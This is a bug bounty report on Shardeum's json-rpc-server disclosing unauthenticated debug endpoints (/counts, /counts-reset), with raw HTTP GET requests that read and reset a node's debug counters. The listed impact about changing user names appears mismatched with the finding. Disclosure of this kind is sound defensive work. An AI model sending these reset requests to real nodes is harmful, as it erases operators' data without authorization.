#35598 [W&A-Insight] Access to debug endpoints without any protection
Submitted on Sep 30th 2024 at 10:56:08 UTC by @blocksmith0 for
Report ID: #35598
Report Type: Websites and Applications
Report severity: Insight
Target: https://github.com/shardeum/json-rpc-server/tree/dev
Impacts:
Changing non-sensitive details of other users (including modifying browser local storage) without already-connected wallet interaction and with up to one click of user interaction: Changing the first/last name of user, Enabling/disabling notifications
The following debug endpoints are exposed without any kind of protection, such as authentication, so the general public can reach them.
This allows anyone to wipe out the debug data of any archiver/node on the network.
GET `/counts`: emits the nestedCounters report as an array.
GET `/counts-reset`: resets the internal nestedCounters object.
To retrieve nestedCounters, send a GET request to the archiver/node:
http://127.0.0.1:4000/counts
Request:
```http
GET /counts HTTP/1.1
Host: 127.0.0.1:4000
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate
Accept-Language: en-GB,en-US;q=0.9,en;q=0.8,ar;q=0.7
Connection: close
```
To reset or clear the internal nestedCounters, send the following GET request to the archiver/node:
http://127.0.0.1:4000/counts-reset
Request:
```http
GET /counts-reset HTTP/1.1
Host: 127.0.0.1:4000
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate
Accept-Language: en-GB,en-US;q=0.9,en;q=0.8,ar;q=0.7
Connection: close
```